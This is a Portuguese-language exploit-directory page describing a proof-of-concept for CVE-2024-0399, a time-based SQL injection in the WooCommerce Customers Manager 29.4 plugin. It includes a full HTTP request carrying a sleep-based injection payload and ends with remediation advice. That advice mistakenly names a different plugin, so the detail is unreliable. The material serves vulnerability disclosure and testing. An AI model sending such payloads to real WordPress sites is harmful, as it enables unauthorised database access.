Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-0399 — Exploit de prova de conceito para CVE-2024-0399, uma injeção SQL baseada em tempo pós-autenticada no WooCommerce Customers Manager 29.4, visando parâmetros de valor de transação via endpoint AJAX de administrador. | Kitploit
Ferramentas/GitHubGitHub/xbz0n/cve-2024-0399
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubxbz0n/cve-2024-0399

CVE-2024-0399

Exploit de prova de conceito para CVE-2024-0399, uma injeção SQL baseada em tempo pós-autenticada no WooCommerce Customers Manager 29.4, visando parâmetros de valor de transação via endpoint AJAX de administrador.

Ver Repositório
11há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-0399 - WooCommerce Customers Manager 29.4 - Injeção de SQL Pós-Autenticação

Título do Exploit: WooCommerce Customers Manager 29.4 - Injeção de SQL Pós-Autenticação
Data: 2024-03-25
Autor do Exploit: Ivan Spiridonov - xbz0n
Link do Software: https://codecanyon.net/item/woocommerce-customers-manager/10965432
Versão: 29.4
Testado em: Ubuntu 22.04
CVE: CVE-2024-0399

Injeção de SQL

O plugin não sanitiza e escapa adequadamente um parâmetro antes de usá-lo em uma instrução SQL, levando a uma injeção de SQL explorável pela função Subscriber+.

Componentes Afetados

  • Plugin: WooCommerce Customers Manager
  • Versão: 29.4
  • Parâmetros Afetados: 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
  • Endpoint Afetado: /wp-admin/admin-ajax.php

Descrição

A vulnerabilidade está localizada nos parâmetros de valor da transação, como 'max_amount', 'max_amount_total', 'min_amount' e 'min_amount_total' usados no endpoint AJAX de administração. Ao injetar comandos SQL nesses parâmetros, atacantes autenticados podem manipular consultas SQL, levando a uma vulnerabilidade de injeção de SQL baseada em tempo.

Prova de Conceito

Exploração Manual

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="end_date"
2024-01-11
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="customer_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="category_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount_total"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount_total"
(select*from(select(sleep(20)))a)
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_filters_relationship"
and
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="statuses"
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
-----------------------------2461714219322283440478088295--

Se a resposta do servidor for atrasada em aproximadamente 20 segundos, isso indica uma exploração bem-sucedida da injeção de SQL baseada em tempo, confirmando a vulnerabilidade.

Recomendações

Os usuários do WooCommerce Customers Manager v29.4 são fortemente aconselhados a restringir o acesso ao endpoint afetado e atualizar o plugin assim que uma versão corrigida for lançada. Este aviso serve como um alerta a todos os usuários do Smart Manager v8.27.0 para tomarem medidas imediatas na atualização de seus plugins para se protegerem contra esta vulnerabilidade de injeção de SQL.

Baixar ferramenta